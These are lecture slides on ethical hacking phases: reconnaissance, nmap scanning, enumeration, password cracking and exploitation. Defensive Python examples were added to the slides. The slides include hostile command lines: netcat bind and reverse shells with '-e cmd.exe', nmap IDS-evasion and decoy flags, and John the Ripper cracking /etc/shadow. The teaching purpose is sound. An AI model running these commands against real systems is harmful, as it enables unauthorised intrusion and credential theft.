dr. igor santos. ¿what is ethical hacking? phases information gathering network mapping &...

Dr. Igor Santos Security of Information Systems Ethical hacking


Post on 15-Dec-2015


Page 1: Dr. Igor Santos.  ¿What is Ethical Hacking?  Phases  Information Gathering  Network Mapping & Scanning  Password Attacks  Service Enumeration

Dr. Igor Santos

Security of Information Systems

Ethical hacking


Contents

What is Ethical Hacking?
Phases
  ▪ Information Gathering
  ▪ Network Mapping & Scanning
  ▪ Password Attacks
  ▪ Service Enumeration
  ▪ Vulnerabilities Identification & Exploitation


What is Ethical Hacking?


Ethical Hacking

A method to evaluate the security of a system or a network of systems by simulating an intruder attack

It shows the actual impact of a vulnerability through controlled tests

It searches for unknown vulnerabilities


Ethical Hacking

Information level
  ▪ White Box
  ▪ Black Box
Social Engineering?
Physical Security?
Dangerous Tests?
  ▪ Exploits
  ▪ DoS
  ▪ …


Information Gathering


Information Gathering

Gather information about the target before the attack
  ▪ Without (too much) contact
  ▪ As much information as possible
  ▪ The information can be very valuable in the future
More information = More probability of success in the attack


Information Gathering

Information we search for:
  ▪ Names and/or positions of workers
  ▪ E-mail addresses
  ▪ User names
  ▪ Public addresses, domains or URLs
  ▪ Used software and technologies
  ▪ Internal addresses or URLs
  ▪ Internal PATHs
  ▪ Data about the system configuration


Information Gathering

  ▪ Client and supplier names
  ▪ Physical location
  ▪ Telephone number
  ▪ …
Iterative process
  ▪ When information is found, new searches are performed


Information Gathering

Sources
  ▪ Search Engines
  ▪ DNS servers
  ▪ Whois servers
  ▪ Metadata
  ▪ Social Networks
  ▪ P2P networks
  ▪ …


Information Gathering Types

Passive Methods
  ▪ The target is not contacted directly
      ▪ Search Engines
      ▪ Whois
      ▪ …
Active Methods
  ▪ They leave some trace in the target
      ▪ DNS zone transfer
      ▪ Web site mirroring
      ▪ …


Information Gathering Techniques

Internet Service Registration (whois)
  ▪ Information about IP record and maintenance
Search Engines
  ▪ Gather public information from company and workers' web sites


Information Gathering Techniques

DNS queries
  ▪ Identification of hosts by DNS querying
Web site analysis
  ▪ Intentionally published information that may pose a security risk


Information Gathering Techniques

New sources!!!
  ▪ Social Networks
  ▪ Metadata
  ▪ P2P networks
  ▪ Job search websites


Search Engines - Google

Google Hacking: searching Google for sensitive information, usually with malicious goals
Johnny Long
  ▪ Google Hacking For Penetration Testers
  ▪ http://www.hackersforcharity.org/ghdb/
      ▪ Not maintained
  ▪ http://www.exploit-db.com/google-dorks/
      ▪ Continuation!!! (9 Nov. 2010)
Cheat-sheet
  ▪ http://www.sans.org/mentor/GoogleCheatSheet.pdf


Search Engines - Google

What to look for?
  ▪ Vulnerable applications (e.g., inurl:eStore/index.cgi?)
  ▪ Error messages (e.g., "Warning: mysql_query()" "invalid query")
  ▪ Files with sensitive information (e.g., filetype:sql "insert into")
  ▪ Websites with private reports (e.g., intitle:"Nessus Scan Report")
  ▪ Web server versions (e.g., "Microsoft-IIS/* server at", intitle:index.of)


Search Engines - Shodan

http://www.shodanhq.com/
A “different” search engine
  ▪ It finds systems by performing searches based on the banner responses
  ▪ Computer search engine
Filters: http://www.shodanhq.com/help/filters
Examples:
  ▪ net:130.206.139.0/24
  ▪ port:22 country:ES


Search Engines - Netcraft

Netcraft (http://news.netcraft.com)
Given a domain, it shows the following information:
  ▪ OS version
  ▪ Web server version
  ▪ Uptime


Search Engines

Countermeasures
  ▪ Properly configure the “robots.txt” file
      ▪ This file tells search engines what they must NOT index
  ▪ Periodically audit the web site with these techniques in order to check that there is no access to sensitive information


Social Networks

Who has a profile on Facebook or LinkedIn?
Do we know how to handle privacy in social networks?
Social Engineering
  ▪ Create a fake profile in order to obtain access to private profiles = A lot of information!
Social Network Search Engines
  ▪ http://www.123people.com/
  ▪ http://www.pipl.com/


Social Networks

Countermeasures
  ▪ Limit the presence in social networks
  ▪ Don’t publish too much
  ▪ Don’t publish automatically
  ▪ Don’t accept every friendship request (we may not be the final victim but an attack vector)


Metadata

Hidden information regarding a document
  ▪ Author
  ▪ Used application
  ▪ Date of creation
  ▪ Camera model (images)
  ▪ E-mail addresses
  ▪ …

They enhance the information present in a document


Metadata - FOCA

A tool that started as a metadata extractor and analyzer and is now more than that:
  ▪ Document panel: searches for several types of documents in Google, Bing and Exalead
  ▪ DNS Search panel: uses different techniques to obtain more domain names
Countermeasures: Metashield Protector
  ▪ It cleans the metadata from documents
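A pre-publication check for the metadata fields listed on the Metadata slide, as an added example (not part of the original slides, and not how FOCA or Metashield Protector work internally). It reads the standard property parts of an Office Open XML file (.docx/.xlsx/.pptx); the function names and the sample package are constructed for this illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)  # keep readable prefixes when rewriting
# Report key -> (package part, element): author, application, creation date, etc.
FIELDS = {
    "author": ("docProps/core.xml", "dc:creator"),
    "last_modified_by": ("docProps/core.xml", "cp:lastModifiedBy"),
    "created": ("docProps/core.xml", "dcterms:created"),
    "application": ("docProps/app.xml", "ep:Application"),
    "company": ("docProps/app.xml", "ep:Company"),
}
PARTS = {part for part, _ in FIELDS.values()}

def audit_ooxml_metadata(data: bytes) -> dict:
    """Return the non-empty identifying properties found in the package."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        roots = {p: ET.fromstring(zf.read(p)) for p in PARTS if p in zf.namelist()}
    for key, (part, tag) in FIELDS.items():
        node = roots[part].find(tag, NS) if part in roots else None
        if node is not None and (node.text or "").strip():
            found[key] = node.text.strip()
    return found

def scrub_ooxml_metadata(data: bytes) -> bytes:
    """Return a copy of the package with those (optional) elements removed."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            payload = src.read(name)
            if name in PARTS:
                root = ET.fromstring(payload)
                for part, tag in FIELDS.values():
                    node = root.find(tag, NS) if part == name else None
                    if node is not None:
                        root.remove(node)
                payload = ET.tostring(root, encoding="utf-8", xml_declaration=True)
            dst.writestr(name, payload)
    return out.getvalue()

def build_sample_package() -> bytes:
    """Constructed sample: only the parts this check reads, not a full .docx."""
    core = (
        '<cp:coreProperties xmlns:cp="%(cp)s" xmlns:dc="%(dc)s" '
        'xmlns:dcterms="%(dcterms)s">'
        "<dc:creator>jdoe</dc:creator><cp:lastModifiedBy>jdoe</cp:lastModifiedBy>"
        "<dcterms:created>2015-12-15T09:00:00Z</dcterms:created>"
        "</cp:coreProperties>" % NS
    )
    app = (
        '<Properties xmlns="%(ep)s"><Application>Microsoft Office Word'
        "</Application><Company>Example Corp</Company></Properties>" % NS
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docProps/core.xml", core)
        zf.writestr("docProps/app.xml", app)
        zf.writestr("word/document.xml", "<document/>")
    return buf.getvalue()

if __name__ == "__main__":
    sample = build_sample_package()
    print("before:", audit_ooxml_metadata(sample))
    print("after: ", audit_ooxml_metadata(scrub_ooxml_metadata(sample)))
```

Run the audit over every document queued for publication and block the upload when it returns a non-empty result.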


Network Mapping & Scanning


Network Mapping & Scanning

Several techniques
  ▪ Host discovery
  ▪ Port scanning
  ▪ IDS (Intrusion Detection System) evasion
  ▪ Service and OS identification (fingerprinting)


Network Mapping & Scanning - Nmap

Tool for network exploration and security auditing

nmap [ <Scan Type> ...] [ <Options> ] { <target specification> }

Options
  ▪ Scan type: -sS, -sX, -sU, …
  ▪ -p <ports>: ports to scan (separated by commas, or “-” for a range; to scan all of them: -p 0-65535)


Network Mapping & Scanning

Zenmap
  ▪ Front-end for nmap
  ▪ It draws a network map with the results
  ▪ Predefined scans


Host Discovery

Identify online systems
  ▪ First step for network mapping
Classic method using ping
  ▪ ICMP echo request
  ▪ Live systems respond with an ICMP echo reply

It is also possible to send TCP packets and wait for the response of the online

ARP Ping in local networks


Host Discovery

Nmap ping (-sP)
  ▪ ICMP echo request & ICMP timestamp request
  ▪ TCP ACK packet port 80
  ▪ TCP SYN packet port 443
Example: nmap -sP 192.168.1.1


Port Scanning

One of the most widespread hacking techniques
  ▪ Nmap in Hollywood: http://nmap.org/movies.html
A computer runs several services that listen on TCP/UDP ports
By means of scanning, we can locate open ports


TCP Port Scanning - TCP Connect scan

TCP Connect scan
  ▪ A TCP connection is established with the destination port (Three-Way Handshake)
  ▪ A very reliable method to determine the port state
  ▪ Simple and easy to detect
      ▪ Generates too much noise
nmap -sT <IP> -p <ports>


TCP Port Scanning - TCP Connect scan

Open port


TCP Port Scanning - TCP Connect scan

Closed port


TCP Port Scanning - TCP Connect scan

Filtered port


TCP Port Scanning - SYN Scan

SYN scan
  ▪ If a listening port is found, the full connection is not established
      ▪ A RST is sent to finalize it
  ▪ Because the Three-Way Handshake is not completed, many systems don’t log the connection attempt
  ▪ An IDS can easily detect it
  ▪ Quick and reliable
nmap -sS <IP> -p <ports>


TCP Port Scanning - SYN Scan

Open port


TCP Port Scanning - SYN Scan

Closed port


TCP Port Scanning - SYN Scan

Filtered port


UDP Port Scanning

UDP is a connectionless protocol
  ▪ Closed ports return the packet “ICMP destination unreachable”
If the ICMP traffic is filtered, the responses for the closed ports are not received
  ▪ The port state cannot be determined conclusively
nmap -sU <IP> -p <ports>


UDP Port Scanning

Open/Filtered port


UDP Port Scanning

Closed port


IDS evasion

Techniques to avoid IDS/IPS
  ▪ Use of fragmented packets
      ▪ Distribution of an IP packet between various data blocks
      nmap -sS -f <IP> -p <ports>
  ▪ Spoofing of origin IPs to emulate multiple attackers
      ▪ Hiding our own IP (attacker)
      nmap -sS -D <IP1,IP2,…IPN> <attacked_IP> -p <ports>


Fingerprinting

Service Fingerprinting
  ▪ Identification of the service listening on a TCP/UDP port
  nmap -sV <IP> -p <port>
O.S. Fingerprinting
  ▪ Identification of the Operating System
  nmap -O <IP>


Network scanning countermeasures

Disable unnecessary services
  ▪ Close ports
Firewall / IDS / IPS
  ▪ ICMP traffic filtering
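The kind of rule an IDS applies to the connect and SYN scans described above, as an added example that is not part of the original slides: it flags a source that probes many distinct ports within a short window and labels the scan style from how open ports were handled. The log format, the flag notation, the thresholds and the addresses (documentation ranges) are all assumptions constructed for this illustration.

```python
from collections import defaultdict, deque

# Constructed connection records: "<epoch> <src> <dst> <dport> <flags>".
# Flag notation (an assumption of this example, mirroring the slides' cases):
#   S   = SYN, no answer             (filtered port)
#   SR  = SYN answered by RST        (closed port)
#   SAR = SYN, SYN/ACK, client RST   (open port, handshake abandoned)
#   SAA = SYN, SYN/ACK, ACK          (open port, full three-way handshake)
SAMPLE_LOG = """\
100.0 203.0.113.7 198.51.100.10 21 SR
100.1 203.0.113.7 198.51.100.10 22 SAR
100.2 203.0.113.7 198.51.100.10 23 S
100.3 203.0.113.7 198.51.100.10 25 SR
100.4 203.0.113.7 198.51.100.10 80 SAR
100.5 203.0.113.7 198.51.100.10 443 SR
200.0 203.0.113.9 198.51.100.10 21 SR
200.2 203.0.113.9 198.51.100.10 22 SAA
200.4 203.0.113.9 198.51.100.10 25 SR
200.6 203.0.113.9 198.51.100.10 80 SAA
200.8 203.0.113.9 198.51.100.10 110 SR
300.0 192.0.2.50 198.51.100.10 443 SAA
301.0 192.0.2.50 198.51.100.10 443 SAA
302.0 192.0.2.50 198.51.100.10 443 SAA
303.0 192.0.2.50 198.51.100.10 443 SAA
304.0 192.0.2.50 198.51.100.10 443 SAA
400.0 192.0.2.60 198.51.100.10 25 SAA
460.0 192.0.2.60 198.51.100.10 80 SAA
520.0 192.0.2.60 198.51.100.10 110 SAA
580.0 192.0.2.60 198.51.100.10 143 SAA
640.0 192.0.2.60 198.51.100.10 443 SAA
""".splitlines()


def detect_port_scans(lines, window=10.0, min_ports=5):
    """Flag sources probing >= min_ports distinct (host, port) pairs within
    `window` seconds; return {src: summary of the widest burst seen}."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        ts, src, dst, port, flags = line.split()
        ts = float(ts)
        burst = recent[src]
        burst.append((ts, dst, int(port), flags))
        while ts - burst[0][0] > window:       # expire probes outside the window
            burst.popleft()
        targets = {(d, p) for _, d, p, _ in burst}
        if len(targets) < min_ports:
            continue
        if src in alerts and alerts[src]["distinct_targets"] >= len(targets):
            continue
        seen = [f for *_, f in burst]
        half_open, full = seen.count("SAR"), seen.count("SAA")
        if half_open and not full:
            style = "syn"            # open ports answered, handshake never completed
        elif full and not half_open:
            style = "connect"        # open ports got a full three-way handshake
        else:
            style = "undetermined"   # no open port was hit, or mixed behaviour
        alerts[src] = {
            "distinct_targets": len(targets),
            "open": sorted(p for _, _, p, f in burst if f in ("SAR", "SAA")),
            "closed": seen.count("SR"),
            "filtered": seen.count("S"),
            "style": style,
        }
    return alerts


if __name__ == "__main__":
    for source, summary in detect_port_scans(SAMPLE_LOG).items():
        print(source, summary)
```

The repeat visitor on port 443 and the slow client spread over several minutes stay below the threshold; a scan paced slower than the window does too, which is why real sensors pair a short window with a longer one.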


Enumeration


Enumeration

Get information through a network service

What information?
  ▪ System user names
  ▪ Email addresses
  ▪ Other systems
  ▪ ...


Enumeration

Services
  ▪ FTP: anonymous / Ftp-user-enum
  ▪ TFTP: without authentication!
  ▪ SMTP: VRFY and EXPN commands → smtpenum
  ▪ DNS: Direct/Reverse Lookup and zone transfer
  ▪ HTTP: banner grabbing
  ▪ RPC: edump, rpcdump, rpcinfo
  ▪ NETBIOS: samrdump
  ▪ SNMP: snmpwalk, snmpcheck
  ▪ LDAP: Brute force by means of the Guest user


Countermeasures - enumeration

  ▪ Keep services up to date
  ▪ Disable unnecessary services


Password Attacks


Password Guessing

Some or all of the data needed to authenticate is unknown
  ▪ User (if the Information Gathering phase has been done correctly, we will have several system users)
  ▪ Password
The password file is known, but it is encrypted
  ▪ Words are tested until the correct one is found


Password Guessing

Systems store a password hash
  ▪ They do not store users' passwords in clear text
  ▪ One-way encryption function
  ▪ It cannot be decrypted
      ▪ http://en.wikipedia.org/wiki/Cryptographic_hash_function


Password Guessing

During a pentest we will collect password hashes
  ▪ Bad configurations
  ▪ Successful intrusion
With administrative permissions it is possible to dump the password hashes of the system users
  ▪ Windows -> SAM
  ▪ Unix -> /etc/passwd, /etc/shadow


Attack Types

Dictionary
  ▪ It is based on a list of user names or passwords
      ▪ Common words
      ▪ Terms related to the audited
  ▪ Try until the right one is found
      ▪ It should be on the list!
  ▪ Success depends on how good and/or extensive the dictionary is
      ▪ /pentest/passwords/wordlists


Attack Types

Hybrid
  ▪ It uses a dictionary, but variations are also introduced
  ▪ Examples
      ▪ Try dictionary words in lowercase and uppercase
      ▪ A is replaced by 4, S by 5, E by 3, ...


Attack Types

Brute Force
  ▪ Usernames or passwords are generated within a range and given a character set
      ▪ E.g., max 8 characters [A-Za-z]
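The three attack types above, turned into the check a defender can run when a password is set (an added example, not part of the original slides): reject anything that reduces to a dictionary word under the hybrid variations listed, and size the brute-force search space for the rest. The wordlist, the guess rate, the one-year threshold and the trailing digit/punctuation rule are assumptions of this illustration.

```python
import string

# Constructed stand-in for a real wordlist (common words plus terms related
# to the audited organisation, as the Dictionary slide describes).
WORDLIST = {"password", "secret", "welcome", "security", "acme"}

# Inverse of the Hybrid slide's substitutions (A -> 4, S -> 5, E -> 3).
UNLEET = str.maketrans({"4": "a", "5": "s", "3": "e"})
# Assumption of this example: appended digits/punctuation is also tried.
SUFFIX = string.digits + string.punctuation


def dictionary_base(candidate, wordlist=WORDLIST):
    """Return the wordlist entry from which a dictionary or hybrid attack
    reaches `candidate`, or None if no modelled variation matches."""
    lowered = candidate.lower()                    # upper/lowercase variations
    for form in (lowered, lowered.rstrip(SUFFIX)):
        for guess in (form, form.translate(UNLEET)):
            if guess in wordlist:
                return guess
    return None


def keyspace(charset_size, max_len, min_len=1):
    """Candidates a brute-force run covers for lengths min_len..max_len."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def review(candidate, guesses_per_second=1e9):
    """Policy verdict for a proposed password. guesses_per_second is an
    assumed offline rate against a fast, unsalted hash."""
    base = dictionary_base(candidate)
    if base is not None:
        return {"accept": False, "reason": f"variation of dictionary word '{base}'"}
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation]
    charset = sum(len(c) for c in classes if any(ch in c for ch in candidate))
    days = keyspace(charset, len(candidate)) / guesses_per_second / 86400
    return {"accept": days > 365, "charset": charset,
            "reason": f"brute force exhausts the space in {days:.1f} days"}


if __name__ == "__main__":
    for pw in ("P4ssword", "Welcome2015!", "xKcdTrbq", "tidal-orchid-vending-mule"):
        print(pw, "->", review(pw))
```

The slide's own case, up to 8 characters from [A-Za-z], is `keyspace(52, 8)`: about 5.45e13 candidates, under a day at the assumed rate.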


John the Ripper

Password cracking tool
Able to break several algorithms
  ▪ DES
  ▪ MD5
  ▪ SHA-1
  ▪ LM (Lan Manager)
  ▪ ...
You can save a session for later cracking


John the Ripper

Single mode
  ▪ Quick test
  ▪ Unlikely to succeed
  ▪ It uses typical passwords and some variations
john --single <password_file>


John the Ripper

Wordlist Mode
  ▪ It tests with a dictionary file
  ▪ Quick
  ▪ Hybrid attack: --rules
john --wordlist=<dictionary> <password_file>
Dictionaries
  ▪ /pentest/passwords/wordlists/


John the Ripper

Incremental Mode
  ▪ It tries all possible combinations of passwords (Brute Force)
      ▪ Only letters (--incremental:alpha)
      ▪ Only numbers (--incremental:digits)
      ▪ Letters, numbers and some special characters (--incremental:lanman)
      ▪ All characters (--incremental:all)
john --incremental:[mode] <password_file>


John the Ripper

Show cracked hashes
john --show /etc/shadow


Other techniques

  ▪ Shoulder surfing
  ▪ Social Engineering
  ▪ Sniffing
      ▪ Capture the session logins
  ▪ Physical access
      ▪ Bypass -> konboot
      ▪ Password cracking: Ophcrack live CD (Rainbow Tables)


Vulnerabilities Identification & Exploitation


Vulnerabilities Identification & Exploitation

Terminology
  ▪ Vulnerability
  ▪ Exploit (client-side, server-side, …)
  ▪ 0-day exploit
  ▪ Payload
  ▪ CVE (Common Vulnerabilities and Exposures): http://cve.mitre.org/


Vulnerabilities Identification & Exploitation

Many types of vulnerabilities:
  ▪ Configuration (not design)
  ▪ Input validation
  ▪ Directory traversal
  ▪ Command Injection
  ▪ SQL Injection
  ▪ Cross-site scripting (XSS)
  ▪ Buffer overflow
  ▪ …


Vulnerabilities Identification & Exploitation

Vulnerability Search
  ▪ Security Focus
      ▪ http://www.securityfocus.com/vulnerabilities
  ▪ National Vulnerability Database
      ▪ http://web.nvd.nist.gov/view/vuln/search
  ▪ CERT
      ▪ http://cert.inteco.es/vulnSearch/Current_News/Vulnerabilities_1/vulnerability_search/?postAction=getVulns
  ▪ Microsoft Security Bulletins
      ▪ http://www.microsoft.com/spain/technet/security/bulletin/ms10-oct.mspx
  ▪ Scanners: Secunia, Nessus, etc.


Vulnerabilities Identification & Exploitation

Exploits Search
  ▪ Exploit Database
      ▪ Milw0rm continuation
      ▪ http://www.exploit-db.com/
  ▪ Others
      ▪ http://www.securiteam.com/exploits
      ▪ http://securityvulns.com/exploits
      ▪ http://www.web-hack.ru/exploit
      ▪ http://tarantula.by.ru/localroot


Vulnerabilities Identification & Exploitation

Metasploit
  ▪ Framework for vulnerability exploitation
  ▪ It helps in the development of new exploits
  ▪ It allows us to define
      ▪ Which exploit is going to be used
      ▪ Which payload is going to be launched
          ▪ Meterpreter: advanced payload without disk access (DLL Injection) → less forensic evidence
      ▪ How it is going to be encoded (avoiding IDS, etc.)


Vulnerabilities Identification & Exploitation

Maintaining access - Backdoors
  ▪ Tiny Shell: Unix backdoor
  ▪ Hydrogen: backdoor from Immunitysec
      ▪ It includes robust encryption and traffic hiding
  ▪ Radmin: Windows backdoor
      ▪ A remote-desktop-like connection. Very easy to use and with a lot of functions


Vulnerabilities Identification & Exploitation

Netcat: it can be used as a backdoor
  ▪ Victim (server): nc -lp 4444 -e cmd.exe
  ▪ Attacker (client): nc -vv <IP victim> 4444
Also “reverse shell”:
  ▪ Attacker (client): nc -vvlp 4444
  ▪ Victim (server): nc -vv <IP attacker> 4444 -e cmd.exe
